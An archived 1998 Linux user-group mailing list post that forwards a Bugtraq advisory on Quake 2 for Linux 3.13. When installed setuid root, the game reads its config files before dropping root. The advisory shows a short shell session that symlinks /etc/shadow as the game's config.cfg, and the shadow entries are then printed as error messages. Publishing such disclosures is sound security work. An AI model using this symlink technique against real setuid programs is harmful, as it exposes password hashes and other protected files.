[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files (fwd)

To: SILUG <silug-discuss@silug.org>
Subject: Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files (fwd)
From: "Koree A. Smith" <koree@accessus.net>
Date: Wed, 25 Feb 1998 13:20:57 -0600 (CST)
Organization: Southern Illinois Linux Users Group
Reply-To: silug-discuss@silug.org
Sender: owner-silug-discuss@silug.org


Woah....for all you "Quakers"....no pun intended...

Koree

Koree A. Smith
--
Development Programmer, CMAC, Inc.
koree@accessus.net
http://www.ameth.org/~koree

---------- Forwarded message ----------
Date: Wed, 25 Feb 1998 05:49:58 -0500
From: kevingeo@CRUZIO.COM
To: BUGTRAQ@NETSPACE.ORG
Subject: Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files

Vulnerable:
Everyone who followed the installation instructions and made Quake2 setuid
root.

Exploit:
Quake2 reads its conf files (and .pak files) before giving up root,
and it doesn't check the permissions before hand.

nop@chrome:~> id
uid=501(nop) gid=100(users) groups=100(users)
nop@chrome:~> mkdir baseq2
nop@chrome:~> ln -s /etc/shadow baseq2/config.cfg
nop@chrome:~> ls -l /usr/games/quake/quake2
-rws--x--x   1 root     root       303444 Feb 24 19:07
/usr/games/quake/quake2
nop@chrome:~> /usr/games/quake/quake2
couldn't exec default.cfg
execing config.cfg
Unknown command "root:[snip]:10137:0:99999:7:::"
Unknown command "bin:*:9977:0:99999:7:::"
Unknown command "daemon:*:9977:0:99999:7:::"
Unknown command "adm:*:9977:0:99999:7:::"
Unknown command "lp:*:9977:0:99999:7:::"
[etc]


--
To unsubscribe, send email to majordomo@silug.org with
"unsubscribe silug-discuss" in the body.

Prev by Date: Re: LAN IPs
Next by Date: IRC Bot Source...
Prev by thread: Re: VNC (was Re: WindowMaker Mirror)
Next by thread: IRC Bot Source...
Index(es):
- Date
- Thread